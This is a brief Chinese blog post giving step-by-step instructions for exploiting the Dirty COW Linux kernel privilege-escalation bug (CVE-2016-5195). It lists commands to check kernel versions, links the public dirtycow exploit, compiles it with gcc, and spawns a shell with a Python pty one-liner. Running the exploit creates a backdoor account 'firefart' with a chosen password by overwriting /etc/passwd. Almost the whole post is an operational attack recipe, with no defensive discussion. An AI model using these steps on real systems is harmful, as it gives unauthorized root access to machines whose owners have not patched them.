linux内核提权(脏牛CVE-2016-5195)
作者:
migrate_ | 来源:发表于
2020-04-24 17:04 被阅读0次
- 漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
- 查看版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*-release

1.jpg
https://github.com/FireFart/dirtycow
chmod 777 dirty.c
#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt

2.jpg
python -c 'import pty;pty.spawn("/bin/sh")'
./dirty 123456 //(密码)

3.jpg

4.jpg
firefart:123456 //用户名:密码
//利用之前最后做个备份 /etc/passwd
本文标题:linux内核提权(脏牛CVE-2016-5195)
本文链接:https://www.haomeiwen.com/subject/ijbfwhtx.html
网友评论